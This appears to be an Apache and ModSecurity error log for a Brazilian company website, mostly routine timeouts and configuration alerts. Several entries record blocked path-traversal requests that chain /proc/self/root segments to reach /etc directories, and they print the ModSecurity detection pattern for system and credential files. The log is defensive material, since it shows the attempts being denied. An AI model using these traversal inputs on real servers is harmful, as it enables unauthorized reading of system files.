[Thu Mar 19 00:27:41.137772 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60306] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:28:07.246026 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:45070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abttR9a6ubjKNq_cu4bkpAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:28:08.569789 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60866] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:28:40.135063 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:28:59.466090 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:56028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtteymAPhZkrhU8w4mzygAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:29:17.038041 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:29:39.255274 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.244.43:43036] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtto-yqAr6etmhZHNoRNgAAAFg"]
[Thu Mar 19 00:29:52.137835 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:30:18.121844 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:30:26.762230 2026] [core:alert] [pid 27403:tid 140411708356352] [client 57.141.18.119:38020] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:30:39.700701 2026] [core:alert] [pid 15826:tid 140411708356352] [client 57.141.18.81:38920] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:30:41.171770 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:31:04.124209 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36594] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:31:27.125802 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:31:48.137795 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:31:54.692890 2026] [core:alert] [pid 27293:tid 140411607643904] [client 74.7.243.128:33842] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/dracut
[Thu Mar 19 00:32:09.137837 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38394] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:32:13.727382 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.228.61:50712] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtuPeyqAr6etmhZHNoRoAAAAEU"]
[Thu Mar 19 00:32:31.123397 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38970] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:32:53.121800 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:33:16.133795 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:33:38.125814 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40684] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:34:04.153812 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41386] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:34:07.723498 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 57.141.18.113:44372] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:34:15.100868 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:60992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtutwbLMZ6AikZjR9UKOAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:34:33.122783 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:34:40.658911 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.244.43:59328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtu0BkFeYa1D6dYQnCXPwAAAcY"]
[Thu Mar 19 00:35:05.256432 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42850] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:35:45.125788 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:36:20.133842 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:36:47.025833 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45622] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:37:08.123113 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:37:17.602058 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.228.61:37188] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtvbQkwaGbbGflqUZBdpAAAAMU"]
[Thu Mar 19 00:37:29.157827 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46736] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:37:52.128190 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47382] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:37:55.824370 2026] [mime_magic:error] [pid 31803:tid 140411590858496] (70014)End of file found: [client 57.141.18.66:50494] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:38:14.123605 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:38:27.857820 2026] [core:alert] [pid 15826:tid 140411708356352] [client 57.141.18.100:51782] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:38:36.129830 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:38:59.125820 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49114] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:39:21.137838 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:39:26.911301 2026] [mime_magic:error] [pid 31803:tid 140411683178240] (70014)End of file found: [client 57.141.18.49:53620] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:39:41.965528 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.244.43:46032] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtv_QkwaGbbGflqUZBd7AAAANI"]
[Thu Mar 19 00:39:43.127243 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:40:05.153791 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:40:29.125939 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51782] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:40:54.274205 2026] [mime_magic:error] [pid 14269:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:54900] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Thu Mar 19 00:40:54.274306 2026] [access_compat:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:54900] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Thu Mar 19 00:40:56.126139 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:41:27.145781 2026] [proxy_fcgi:error] [pid 27293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:41:42.236179 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 57.141.18.58:57468] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:42:09.149794 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:42:20.507158 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.228.61:53378] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtwnAbLMZ6AikZjR9ULrAAAAAQ"]
[Thu Mar 19 00:42:46.177915 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:43:13.133785 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56246] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:43:35.097818 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56946] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:43:56.133781 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:44:01.356237 2026] [mime_magic:error] [pid 15051:tid 140411590858496] (70014)End of file found: [client 57.141.18.5:33308] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:44:19.131375 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58258] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:44:25.344010 2026] [mime_magic:error] [pid 27293:tid 140411632822016] (70014)End of file found: [client 57.141.18.15:34210] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:44:35.507333 2026] [core:alert] [pid 15826:tid 140411624429312] [client 74.7.241.31:37550] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/system
[Thu Mar 19 00:44:41.125840 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:44:42.128591 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.244.43:47112] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtxKuyqAr6etmhZHNoTUgAAAFY"]
[Thu Mar 19 00:45:02.334343 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:45:12.381495 2026] [mime_magic:error] [pid 27403:tid 140411624429312] (70014)End of file found: [client 74.7.243.128:38120] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/kbd/keymaps/legacy
[Thu Mar 19 00:45:26.141795 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60450] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:45:47.391919 2026] [core:alert] [pid 27293:tid 140411699963648] [client 57.141.18.40:36802] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:45:49.133830 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33048] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:45:57.838891 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:48224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtxdCmAPhZkrhU8w4m2QQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:46:11.126188 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:46:31.093047 2026] [core:alert] [pid 27403:tid 140411574073088] [client 57.141.18.34:37722] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:46:35.129792 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:46:35.829118 2026] [mime_magic:error] [pid 31803:tid 140411582465792] (70014)End of file found: [client 57.141.18.50:38436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:46:58.129905 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34956] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:47:21.348438 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.228.61:49620] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtxyQbLMZ6AikZjR9UMZgAAAA4"]
[Thu Mar 19 00:47:26.157883 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:47:32.998452 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:51188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtx1P-YZRR_7pZ7nDI93gAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:47:55.173803 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:48:34.061855 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37544] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:49:05.129793 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:49:31.142405 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39382] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:49:45.078874 2026] [core:alert] [pid 15051:tid 140411632822016] [client 57.141.18.63:44244] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:49:46.843157 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.244.43:36264] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtyWgbLMZ6AikZjR9UMyQAAAAI"]
[Thu Mar 19 00:49:53.157806 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:50:18.141896 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:50:39.121298 2026] [proxy_fcgi:error] [pid 15051:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:50:39.581303 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:46588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyjwkwaGbbGflqUZBgIAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:50:49.261272 2026] [mime_magic:error] [pid 14269:tid 140411716749056] (70014)End of file found: [client 57.141.18.91:46302] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
